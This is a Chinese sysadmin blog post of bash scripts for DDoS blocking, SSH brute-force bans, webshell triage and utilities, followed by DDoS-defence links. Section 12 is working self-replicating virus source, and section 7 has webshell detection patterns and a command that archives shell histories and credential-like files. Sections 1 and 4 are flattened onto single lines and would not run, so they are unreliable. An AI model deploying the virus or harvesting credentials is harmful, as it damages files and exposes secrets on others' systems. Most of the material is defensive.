一、防DDoS的一个思路(直接屏蔽):
#!/bin/bash /bin/netstat -na | grep ESTABLISHED | awk '{print $5}' | awk -F: '{print $1}' | sort | uniq -c | sort -rn | head -10 | grep -v -E '192.168|127.0' | awk '{if($2!=null && $1>4) {print $2}}' > /tmp/dropip for i in $(cat /tmp/dropip) do /sbin/iptables -A INPUT -s $i -j DROP echo "$i kill at `date`">>/var/log/ddos done
二、批量添加用户
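#!/usr/bin/env bash
# Create a fixed set of local accounts with one shared initial password.
#
# Security notes. The original set the literal password "redhat" for every
# user via `passwd --stdin`, which only exists on the RHEL family. This version
#   * takes the initial password from $INITIAL_PASSWORD (falls back to the
#     original "redhat" so existing runbooks keep working -- change it),
#   * uses chpasswd, present on both Debian/Ubuntu and RHEL families, and
#     feeds it the secret on stdin so it never shows up in `ps`,
#   * skips accounts that already exist instead of failing half-way,
#   * expires the password immediately (chage -d 0) so each user must pick
#     their own at first login -- a shared provisioning password must not
#     stay in use.
set -eu

readonly USERS=(tom jerry joe jane)
readonly INITIAL_PASSWORD="${INITIAL_PASSWORD:-redhat}"

# add_user NAME: create NAME if it does not exist, set the initial password
# and force a change on first login.
add_user() {
  local name=$1
  if id "$name" >/dev/null 2>&1; then
    printf 'skip: user %s already exists\n' "$name" >&2
    return 0
  fi
  useradd "$name"
  printf '%s:%s\n' "$name" "$INITIAL_PASSWORD" | chpasswd
  chage -d 0 "$name"
}

if (( EUID != 0 )); then
  printf 'error: must run as root\n' >&2
  exit 1
fi
for user in "${USERS[@]}"; do
  add_user "$user"
done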
三、批量ping判断局域网主机存活情况
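#!/usr/bin/env bash
# Report which hosts in PREFIX.100 - PREFIX.200 answer ICMP echo requests.
# Usage: ./ping_sweep.sh [PREFIX]   (default 192.168.1, as in the original)
#
# Bug fixed: the original wrote `ping -c2 $host & >/dev/null`, which puts
# ping in the background and then tests $? of the *backgrounding* -- always
# 0 -- so every host was reported UP. Each probe now reports its own exit
# status; probes still run in parallel and the script waits for all of them.
# A DOWN answer only means no ICMP reply within the timeout; hosts that
# filter ICMP look DOWN too.
set -u

readonly PREFIX=${1:-192.168.1}

# probe HOST: print "HOST is UP" when two echo requests (1 s timeout each)
# get a reply, "HOST is DOWN" otherwise.
probe() {
  local host=$1
  if ping -c 2 -W 1 "$host" >/dev/null 2>&1; then
    printf '%s is UP\n' "$host"
  else
    printf '%s is DOWN\n' "$host"
  fi
}

for last in {100..200}; do
  probe "$PREFIX.$last" &
done
wait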
四、起到类似DenyHosts作用的bash脚本
Ubuntu版本:
#!/bin/bash cat /var/log/auth.log.1 | awk '/Invalid user/{print $NF}' | sort | uniq -c | awk '{print $2"="$1;}' >/root/black.txt # awk '/Invalid user/{print $NF}' auth.log.1 | sort | uniq -c | awk '{print $2"="$1;}' >/root/black.txt DEFINE="10" for i in `cat /root/black.txt` do IP=`echo $i | awk -F= '{print $1}'` NUM=`echo $i | awk -F= '{print $2}'` if [ $NUM -gt $DEFINE ]; then grep $IP /etc/hosts.deny > /dev/null if [ $? -gt 0 ]; then echo "sshd:$IP" >> /etc/hosts.deny fi fi done #vim /etc/crontab #* */1 * * * root sh /root/ssh_deny.sh #每隔一个小时执行一次
适用于RedHat系列的版本:
#!/bin/bash cat /var/log/secure | awk '/Failed/{print $(NF-3)}' | sort | uniq -c | awk '{print $2"="$1;}' >/root/black.txt DEFINE="10" for i in `cat /root/black.txt` do IP=`echo $i | awk -F= '{print $1}'` NUM=`echo $i | awk -F= '{print $2}'` if [ $NUM -gt $DEFINE ]; then grep $IP /etc/hosts.deny > /dev/null if [ $? -gt 0 ]; then echo "sshd:$IP" >> /etc/hosts.deny fi fi done #vim /etc/crontab #* */1 * * * root sh /root/ssh_deny.sh #每隔一个小时执行一次
五、批量添加可执行权限
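#!/usr/bin/env bash
# Make every script/installer file below the current directory executable.
#
# Bug fixed: the original wrote the find group as `( -iname ... )`. To bash
# a bare parenthesis is a subshell, so the command was a syntax error; the
# group must be written `\( ... \)`.
#
# Note: this trusts every matching file under the tree. Run it on trees you
# own, never on an upload directory or other untrusted content.
set -u

# make_executable DIR: chmod +x every regular file under DIR whose name ends
# in one of the script/installer extensions (case-insensitive). Paths are
# NUL-delimited so odd names are safe; `xargs -r` skips the chmod call when
# nothing matched. Returns the pipeline's status.
make_executable() {
  local root=$1
  find "$root" -type f \( -iname '*.sh' -o -iname '*.csh' -o -iname '*.ksh' \
      -o -iname '*.pl' -o -iname '*.bin' -o -iname '*.run' -o -iname '*.bundle' \
      -o -iname '*.rb' -o -iname '*.py' \) -print0 \
    | xargs -0 -r chmod +x --
}

make_executable "$PWD"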
六、定位可疑文件
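#!/usr/bin/env bash
# Look for webshell drop points in a web tree: PHP files inside world-writable
# directories, and JPEG files that carry PHP code (attackers hide PHP in
# images to get past upload filters).
#
# Changes from the original: directories are matched with -perm -0002 (any
# world-writable directory), not only an exact 0777, since 0757 or 1777 are
# just as writable for an attacker; paths are NUL-delimited so names with
# spaces work; the JPEG scan prints matching file names (-l) instead of
# dumping binary image data to the terminal. Every hit is a lead, not proof
# of compromise -- "php" also turns up in harmless EXIF/XMP metadata.
set -u

# find_php_in_writable_dirs ROOT: print every *.php file located under any
# world-writable directory below ROOT.
find_php_in_writable_dirs() {
  local root=$1 dir
  while IFS= read -r -d '' dir; do
    find "$dir" -type f -name '*.php' -print
  done < <(find "$root" -type d -perm -0002 -print0)
}

# find_php_in_jpgs ROOT: print the *.jpg files below ROOT whose bytes contain
# "php". -iname matches the extension case-insensitively and grep -i does the
# same for the content. Prints a note on stderr and returns 0 if ROOT does
# not exist.
find_php_in_jpgs() {
  local root=$1
  if [[ ! -d "$root" ]]; then
    printf 'skip: %s is not a directory\n' "$root" >&2
    return 0
  fi
  find "$root" -type f -iname '*.jpg' -print0 | xargs -0 -r grep -il php --
}

find_php_in_writable_dirs "$PWD"
find_php_in_jpgs wp-content/uploads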
七、使用find命令进行查找-打包
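# Triage commands for a possibly compromised PHP (WordPress) tree. Run them
# from the web root. They are heuristics: every hit needs a human look, and
# no hits does not prove a clean tree.

# PHP files modified in the last 7 days.
find . -type f -name '*.php' -mtime -7

# Classic loader/obfuscation calls. The " *(" tolerates any number of spaces
# before the parenthesis. -print0/-0 keeps odd file names safe; -l prints
# each matching file once.
find . -type f -name '*.php' -print0 | xargs -0 -r grep -l 'eval *('
find . -type f -name '*.php' -print0 | xargs -0 -r grep -l 'base64_decode *('
find . -type f -name '*.php' -print0 | xargs -0 -r grep -l 'gzinflate *('
find . -type f -name '*.php' -print0 | xargs -0 -r grep -l 'eval *(str_rot13 *(base64_decode *('

# Network, exec and mail primitives. In an extended regex "(" opens a group,
# so the literal parenthesis must be escaped; the original "(mail|...) *("
# was an unbalanced group that grep refuses to run.
find . -type f -name '*.php' -print0 \
  | xargs -0 -r grep -E -i -l '(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *\('

# preg_replace with the /e modifier (code execution; removed in PHP 7). The
# pattern delimiter is captured in \1 and the modifier list after the closing
# delimiter must contain an "e". The backslashes had been stripped by the
# blog; without them \1 and \2 are plain digits and nothing sensible matches.
find . -type f -name '*.php' -print0 \
  | xargs -0 -r grep -E -i -l "preg_replace *\((['\"])(.).*\2[a-z]*e[^\1]*\1 *,"

# Compare a known-clean copy against the suspect tree, ignoring wp-content/.
diff -r wordpress-clean/ wordpress-compromised/ -x wp-content

# Collect scripts, config files, shell histories and dot-files with "pass" in
# their name into an archive for offline review.
#   * -regextype posix-extended is required: find's default (emacs) syntax
#     treats "|" as a literal character, so the original alternation could
#     never match, and "." must be escaped to mean a literal dot.
#   * The archive holds shell histories and credential-like files. Treat it
#     as sensitive: chmod 600 it, move it off-host only over an encrypted
#     channel, and delete it when the review is done.
find / ! -path '/usr/share/*' ! -path '/usr/lib/*' ! -path '/root/.pyenv/*' \
  -regextype posix-extended \
  -regex '.*\.(sh|pl|py|conf|cnf|ini)$|.*/\..*history$|.*/\..*pass.*' \
  -print | zip pack.zip -@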
八、删除重复的文件
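#!/usr/bin/env bash
# Delete duplicate files (identical content by MD5) in ONE directory, keeping
# the byte-order-first name of every duplicate group.
# Usage: ./removeDuplicate.sh dir_to_check
#
# Rewritten because the original parsed `ls -lS` (breaks on names with
# spaces), only compared neighbouring same-size entries (A == C with a
# different B in between was missed), hashed names relative to the current
# directory rather than the directory given, and left duplicate_file /
# duplicate_sample scratch files in the cwd. As before, only regular files
# directly inside DIR are examined (no recursion).
set -u

# classify DIR: print one "ACTION<TAB>PATH" line per file that belongs to a
# duplicate group: "drop" for every copy after the first in byte order, and
# "keep" for the copy that survives. Files with unique content are not listed.
classify() {
  local dir=$1
  find "$dir" -maxdepth 1 -type f -print0 \
    | LC_ALL=C sort -z \
    | xargs -0 -r md5sum -- \
    | awk '{ h = $1; sub(/^[^ ]+  /, "")
             n[h]++
             if (n[h] == 1) first[h] = $0; else print "drop\t" $0 }
           END { for (h in n) if (n[h] > 1) print "keep\t" first[h] }'
}

main() {
  local dir=${1:-} action path
  local -a kept=()
  if (( $# != 1 )); then
    printf 'Usage: %s dir_to_check\n' "$0" >&2
    return 2
  fi
  if [[ ! -d "$dir" ]]; then
    printf 'error: %s is not a directory\n' "$dir" >&2
    return 1
  fi
  printf 'Removing...\n'
  while IFS=$'\t' read -r action path; do
    if [[ "$action" == drop ]]; then
      printf '%s\n' "$path" >&2          # name each removed file, like the original tee /dev/stderr
      rm -f -- "$path" || return 1
    else
      kept+=("$path")
    fi
  done < <(classify "$dir")
  printf 'Removed duplicate files successfully.\n'
  if (( ${#kept[@]} > 0 )); then
    printf 'The rest file name is %s\n' "${kept[*]}"
  fi
}
main "$@"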
九、统计文件中的出现的单词个数&百分比
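#!/usr/bin/env bash
# Print every word in a file with its count and its share of all words.
# Usage: ./wordfreq.sh filename
#
# Fixes vs. the original: the word-boundary anchors had lost their
# backslashes (`b[[:alpha:]]+b` only matched words beginning and ending in
# "b"); the printf formats said "n" where "\n" was meant; `exit -1` is not a
# valid exit status; and awk's `for (k in count)` order is arbitrary, so the
# table is now sorted by count, highest first, then by word.
set -u

# word_stats FILE: print a "Word Count Rate" header and one row per distinct
# word (letters only, case-sensitive) with its count and percentage of all
# words. An empty file yields the header only. Returns 1 if FILE is unreadable.
word_stats() {
  local file=$1
  if [[ ! -r "$file" ]]; then
    printf 'error: cannot read %s\n' "$file" >&2
    return 1
  fi
  printf '%-14s%-8s%s\n' "Word" "Count" "Rate"
  # grep exits 1 when the file has no words; that is not an error here.
  { grep -oE '\b[[:alpha:]]+\b' -- "$file" || true; } \
    | awk '{ count[$0]++; total++ }
           END { for (w in count) print count[w] "\t" total "\t" w }' \
    | LC_ALL=C sort -t $'\t' -k1,1nr -k3,3 \
    | awk -F '\t' '{ printf("%-14s%-8d%.2f%%\n", $3, $1, $1 / $2 * 100) }'
}

main() {
  if (( $# != 1 )); then
    printf 'Usage: %s filename\n' "$0" >&2
    return 1
  fi
  word_stats "$1"
}
main "$@"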
十、列出指定路径中的各个文件的文件类型
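#!/usr/bin/env bash
# Count the file types (as reported by `file -b`) of every regular file below
# a path.
# Usage: ./filetypes.sh path_to_check
#
# Fixes vs. the original: a missing argument printed the usage text but then
# went on to run `find ""`; the unquoted $path and the newline-delimited read
# loop broke on unusual names; `let statarray[...]++` returns non-zero on the
# first increment. Output is now sorted by type so runs are comparable.
set -u

# file_type_counts DIR: print "TYPE : N" for each distinct `file -b`
# description among the regular files under DIR, sorted by type.
# Returns 1 if DIR is not a directory.
file_type_counts() {
  local dir=$1 path ftype
  local -A counts=()
  if [[ ! -d "$dir" ]]; then
    printf 'error: %s is not a directory\n' "$dir" >&2
    return 1
  fi
  while IFS= read -r -d '' path; do
    ftype=$(file -b "$path")
    counts[$ftype]=$(( ${counts[$ftype]:-0} + 1 ))
  done < <(find "$dir" -type f -print0)
  (( ${#counts[@]} > 0 )) || return 0
  for ftype in "${!counts[@]}"; do
    printf '%s : %s\n' "$ftype" "${counts[$ftype]}"
  done | LC_ALL=C sort
}

main() {
  if (( $# != 1 )); then
    printf 'Usage: %s path_to_check\n' "$0" >&2
    return 1
  fi
  printf '[+]File Types And Counts\n'
  file_type_counts "$1"
}
main "$@"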
十一、从指定文件中提取Email和URL的个数
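#!/usr/bin/env bash
# Count the distinct e-mail addresses and URLs found in a file.
# Usage: ./extract.sh filename
#
# Fixes vs. the original: `exit -a` is not a valid exit status; the "." in
# front of the top-level domain was an unescaped wildcard; only http:// was
# matched, never https://; and the e-mail extraction was commented out even
# though the script's title promises it. TLD length is no longer capped at
# four letters (.museum, .security ...).
set -u

# count_emails FILE: print "N ADDRESS" for each distinct e-mail-looking
# token in FILE, sorted by address. Prints nothing if there are none.
count_emails() {
  { grep -oE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}' -- "$1" || true; } \
    | LC_ALL=C sort | uniq -c
}

# count_urls FILE: print "N URL" for each distinct http(s) scheme+host in
# FILE, sorted. As in the original only the host part is captured, so
# https://example.com/a and https://example.com/b count as one.
count_urls() {
  { grep -oE 'https?://[A-Za-z0-9.-]+\.[A-Za-z]{2,}' -- "$1" || true; } \
    | LC_ALL=C sort | uniq -c
}

main() {
  local file=${1:-}
  if (( $# != 1 )); then
    printf '[+]Usage:%s filename\n' "$0" >&2
    return 1
  fi
  if [[ ! -r "$file" ]]; then
    printf 'error: cannot read %s\n' "$file" >&2
    return 1
  fi
  count_emails "$file"
  printf '[+]Emails found.\n'
  count_urls "$file"
  printf '[+]Urls found.\n'
}
main "$@"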
十二、自感染脚本
#!/bin/bash
#Virus by ijse start
# DEMO ONLY -- self-replicating script. On every run it prepends the lines
# between the two marker comments to EVERY executable regular file under ./
# (find -executable -type f). That includes compiled binaries, which a text
# prefix corrupts. Run it only in a throwaway VM or container, on copies you
# do not care about.
#=====Your Code Here=========
echo "!This file has been infected by CpVirus written by ijse."
echo "!You can remove the virus code by editing this file."
echo "!Just remove the lines between '#Virus by ijse start' and '#Virus by ijse end'."
#============================
# Unquoted command substitution: paths containing whitespace are split.
for exfile in `find ./ -executable -type f`
do
tmpFile=$exfile.tmp
# "Already infected" test: reads line 2 of the target.
firstLine=`head -2 $exfile|tail -1`
if [ "$firstLine" != "#Virus by ijse start" ]; then
# Line numbers of the two markers in this script ($0); -x = whole-line match.
endnum=`grep -n -x "#Virus by ijse end" $0 | awk -F":" '{print $1}'`
startnum=`grep -n -x "#Virus by ijse start" $0 | awk -F":" '{print $1}'`
let length=$endnum-$startnum+1
# NOTE(review): the payload written here is lines startnum..endnum with no
# shebang in front, so in a freshly infected file the start marker is on
# line 1 while the check above looks at line 2 -- targets other than $0
# appear to be re-infected on every run. Verify before relying on the check.
echo "`head -$endnum $0|tail -$length`" > $tmpFile
cat $exfile >> $tmpFile
# Only u+x is restored; group/other execute bits and the owner are lost.
chmod u+x $tmpFile
rm $exfile
mv $tmpFile $exfile
fi
done
#Virus by ijse end
十三、用Bash进行MySQL批量插入操作
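#!/usr/bin/env bash
# Bulk-insert 10,000 (student number, phone number) rows into test.students.
#
# Fixes vs. the original: `whlie` was a typo for `while`, so the script never
# ran at all; the root password was hard-coded on the mysql command line,
# where it is visible in `ps` output and shell history; and one mysql process
# was spawned per row, i.e. 10,000 connections. The statements are now
# generated once and sent through a single mysql client inside one
# transaction. Credentials come from a client config file -- $MYSQL_CNF or
# ~/.my.cnf, mode 0600, holding a [client] section with user and password.
set -u

readonly FIRST_ID=100000          # first student number
readonly LAST_ID=109999           # last student number (inclusive)
readonly FIRST_PHONE=18200000000  # phone paired with FIRST_ID; both advance together

# insert_statements FIRST LAST PHONE: print one INSERT per id in FIRST..LAST,
# with the phone number starting at PHONE and incrementing alongside the id.
# Prints nothing when FIRST > LAST.
insert_statements() {
  local id=$1 last=$2 phone=$3
  while (( id <= last )); do
    printf 'insert into test.students values (%d,%d);\n' "$id" "$phone"
    id=$(( id + 1 ))
    phone=$(( phone + 1 ))
  done
}

main() {
  local cnf=${MYSQL_CNF:-${HOME:-}/.my.cnf}
  if [[ ! -r "$cnf" ]]; then
    printf 'error: %s not readable; store [client] user/password there (chmod 600), not on the command line\n' "$cnf" >&2
    return 1
  fi
  {
    printf 'START TRANSACTION;\n'
    insert_statements "$FIRST_ID" "$LAST_ID" "$FIRST_PHONE"
    printf 'COMMIT;\n'
  } | mysql --defaults-extra-file="$cnf"
}
main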
待续……
说明:其中有几个脚本的内容参考了nightx.info在GitHub上的代码,自己进行了测试和一些修改。
FastNetMon – Debian 官方推出的一个 DDoS 检测工具,基于三个抓包引擎:NetFlow、 IPFIX、 sFLOW,可以通过外部脚本通知用户
https://packages.debian.org/sid/fastnetmon
https://github.com/pavel-odintsov/fastnetmon
写给十九大安保应急的兄弟们 来看看DDOS攻击应急预案
http://blog.nsfocus.net/ddos-attack-plan/
`
通常用三层清洗方案来防御DDoS攻击
安保中可能出现的DDoS攻击场景
摸清楚环境与资源 为DDoS应急预案提供支撑
安保应急中的DDoS攻击应急预案
`
[第10期] 低成本实现百 Gbps DDoS/CC 攻击防护
https://mp.weixin.qq.com/s/RgyPq9BA3XHJ8cW1CQD71Q
https://github.com/ismailtasdelen/Anti-DDOS/blob/master/anti-ddos.sh
DDOS攻击方式总结
https://www.secpulse.com/archives/64088.html
破坏之王:DDoS攻击与防范深度剖析
https://www.amazon.cn/%E5%9B%BE%E4%B9%A6/dp/B00JUDDZBE
DDOS攻击的治理和缓解
https://www.secpulse.com/archives/65477.html
`
1.1 DDOS攻击的治理
1.1.1 僵尸网络的治理
1.1.2 地址伪造攻击的治理
1.1.2.1 CERT
1.1.2.2 RFC 2827
1.1.2.3 Unicast Reverse Path Forwarding
1.1.2.4 分布式过滤方式
1.1.3 攻击反射点的治理
1.2攻击的缓解
1.2.1 攻击流量的稀释
1.CDN
2.Anycast
1.3 攻击流量的清洗
1.3.1 IP信誉检查
1.3.2 攻击特征匹配
1.3.3 速度检查与限制
1.3.4 TCP代理和验证
1.3.5 协议完整性验证
1.3.6 客户端真实性验证
`
一个简单的针对VPS、专用服务器和物联网设备的防ddos解决方案(An Easy and Simple Anti-DDoS solution for VPS,Dedicated Servers and IoT devices – Beta)
https://github.com/fnzv/net-Shield
浅析AnyCast网络技术
https://blog.csdn.net/enweitech/article/details/79778528
https://paper.tuisec.win/detail/da97bf895579e6e